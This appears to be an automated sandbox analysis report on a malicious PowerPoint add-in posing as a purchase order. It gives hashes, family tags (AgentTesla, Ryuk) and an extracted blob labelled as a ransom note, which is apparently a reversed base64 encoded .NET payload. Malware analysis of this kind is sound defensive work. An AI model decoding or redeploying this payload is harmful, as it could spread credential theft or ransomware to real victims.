agenttesla | 0e9423c6b3d555a01513b11f32ab37696a240a469b496b64c01069c40e636447

Target

PO - CE AUSTRALIA PTY LTD.ppam
Size

10KB
MD5

7c629522213c57c3b3d66ee8e6c13fed
SHA1

352b55636c67a5cd27a998888df0a137ef5433d8
SHA256

a2e98dd3fa146e70b06e95d0cbbf9a831a04e94572a229e6d554372cb6943c04
SHA512

385fbe8c518741e20daf5a62ac6e772d9d7b813e53e2a02b75f32287711c5ca316e162d24b04f48c1a90d799314f330fdc564a3494a27fa3811c1eb87571563b

Score

10^/10

agenttesla ryuk keylogger persistence ransomware spyware stealer trojan upx

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\74AX7LAV\5940e4_39e7aca5ca73408f9ea38510ed3aa48e[1].txt

Family

ryuk

Ransom Note

=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